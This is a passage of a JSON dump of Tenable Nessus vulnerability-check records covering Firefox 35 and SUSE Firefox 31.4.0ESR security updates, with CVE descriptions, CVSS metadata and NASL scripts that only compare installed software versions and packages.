'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate.\n (CVE-2014-8642)\n\n - A flaw exists in the Gecko Media Plugin which can allow an attacker to break out of the sandbox. (CVE-2014-8643)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Firefox < 35 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_35_0.NASL", "href": "https://www.tenable.com/plugins/nessus/80523", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80523);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8636\",\n \"CVE-2014-8637\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\",\n \"CVE-2014-8640\",\n \"CVE-2014-8641\",\n \"CVE-2014-8642\",\n \"CVE-2014-8643\"\n );\n script_bugtraq_id(\n 72041,\n 72042,\n 72043,\n 72044,\n 72045,\n 72046,\n 72047,\n 72048,\n 72049,\n 72050\n );\n\n script_name(english:\"Firefox < 35 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote Windows host is prior\nto 35.0. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific\n properties can bypass XrayWrappers. This can allow web\n content to confuse privileged code, potentially\n enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When\n rending a malformed bitmap image, memory may not always\n be properly initialized, which can result in a leakage\n of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header, which allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block\n of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way\n tracks are handled, which can result in a potentially\n exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status\n Protocol responder certificates fail to recognize the\n id-pkix-ocsp-nocheck extension. This can result in a\n user connecting to a site with a revoked certificate.\n (CVE-2014-8642)\n\n - A flaw exists in the Gecko Media Plugin which can allow\n an attacker to break out of the sandbox. (CVE-2014-8643)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-07/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox 35.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'35', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:16", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and updating the root certificate list.\n\nFor more information, please see https://www.mozilla.org/en-US/security/advisories/", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10225)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1569", "CVE-2014-8634", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:MozillaFirefox", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:libfreebl3", "p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit", "p-cpe:/a:novell:suse_linux:11:libsoftokn3", "p-cpe:/a:novell:suse_linux:11:libsoftokn3-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-nss", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FIREFOX-201501-150127.NASL", "href": "https://www.tenable.com/plugins/nessus/81123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81123);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\");\n\n script_name(english:\"SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10225)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs\nand security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and\nupdating the root certificate list.\n\nFor more information, please see\nhttps://www.mozilla.org/en-US/security/advisories/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=910647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913104\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-1569.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8634.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8638.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8641.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10225.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"MozillaFirefox-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"MozillaFirefox-translations-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libfreebl3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libfreebl3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libsoftokn3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libsoftokn3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"mozilla-nss-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"mozilla-nss-tools-3.17.3-0.8.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:55:02", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and updating the root certificate list.\n\nFor more information, please see https://www.mozilla.org/en-US/security/advisories/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "SUSE SLES10 Security Update : Mozilla Firefox (SUSE-SU-2015:0171-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1569", "CVE-2014-8634", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:mozilla-nss", "p-cpe:/a:novell:suse_linux:mozilla-nss-devel", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2015-0171-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83676", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0171-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83676);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\");\n script_bugtraq_id(71675, 72041, 72044, 72045, 72046, 72047, 72048, 72049);\n\n script_name(english:\"SUSE SLES10 Security Update : Mozilla Firefox (SUSE-SU-2015:0171-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs\nand security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and\nupdating the root certificate list.\n\nFor more information, please see\nhttps://www.mozilla.org/en-US/security/advisories/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910669\"\n );\n # https://download.suse.com/patch/finder/?keywords=b6b2353659cdca6dc3d8d5d591e00851\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ad6a431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-1569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8636/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8637/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8638/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8639/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8640/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8641/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150171-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51e5995f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Mozilla Firefox packages\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.17.3-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"mozilla-nss-3.17.3-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"mozilla-nss-devel-3.17.3-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"mozilla-nss-tools-3.17.3-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"MozillaFirefox-31.4.0esr-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"MozillaFirefox-translations-31.4.0esr-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:37", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and updating the root certificate list.\n\nFor more information, please see https://www.mozilla.org/en-US/security/advisories/", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10225)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1569", "CVE-2014-8634", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:MozillaFirefox", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:libfreebl3", "p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit", "p-cpe:/a:novell:suse_linux:11:libsoftokn3", "p-cpe:/a:novell:suse_linux:11:libsoftokn3-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-nss", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FIREFOX-201501-150126.NASL", "href": "https://www.tenable.com/plugins/nessus/81122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81122);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", 